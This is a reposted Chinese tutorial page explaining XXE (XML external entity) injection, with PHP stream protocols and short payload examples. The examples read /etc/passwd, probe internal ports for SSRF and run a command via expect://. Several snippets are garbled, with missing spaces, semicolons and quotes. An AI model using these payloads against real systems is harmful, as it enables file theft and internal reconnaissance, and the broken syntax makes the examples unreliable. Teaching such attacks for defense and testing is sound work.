PHP   发布时间:2022-04-04  发布网站:大佬教程  code.js-code.com
大佬教程收集整理的这篇文章主要介绍了XXE 咖面-六娃大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。

XXE 概述

  • XXE也叫做XML外部实体注入[XML External Entity] , 当XML允许引用外部实体并解析时,会导致攻击者构造恶意实体的payloadj进行攻注入攻击,导致攻击者可以读取任意文件、执行命令、攻击网站、以及进行SSRF攻击等

XML基础

  • XML声明: < ?xml version="1.0" encoding= "utf-8"?>

  • 内部DTD声明: <!DOCTYPE根元素名称[元素声明] >

  • 外部实体声明: <!ENTITY实体名称SYstem "URI/URL" >

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
<!ENTITY testSYstem "PHP协议">
]>

PHP协议概述

  • 进行XXE漏洞测试时,除了一些基本的XML基础.根据不同的环境,需要了解不同的协议,如PHP协议:
  • PHP支持的协议: file:// http:// ft:// PHP:// zlib:// data:// glob:// phar:// ssh2:// rar:// ogg:// expect://

xml危害一 [任意文件的读取]

<!--先定义 -->
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
<!ENTITY test SYstem "file:///etc/passwd">
]>
<!--再引用 -->
<x>&test</x>

ssrf [内网探测]

<?xml version="1.0" encoding= "utf-8"?> <!DOCTYPE a [ <!ENTITY b SYstem "http://127.0.0.1:3306*> ]> <c>&b;</c>

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPEa[ <!ENTITY b SYstem "http://127.0.0.1/1.txt"> ]> <c>&b;</c>

命令执行

  • expect:// 处理交互式的流 (认不按照的)
<?xml version="1.0" encoding= "utf-8"?> <!DOCTYPE a [ <!ENTITY b SYstem "expect://./test"> ]> <c>&b;</c>

大佬总结

以上是大佬教程为你收集整理的XXE 咖面-六娃全部内容,希望文章能够帮你解决XXE 咖面-六娃所遇到的程序开发问题。

如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
标签: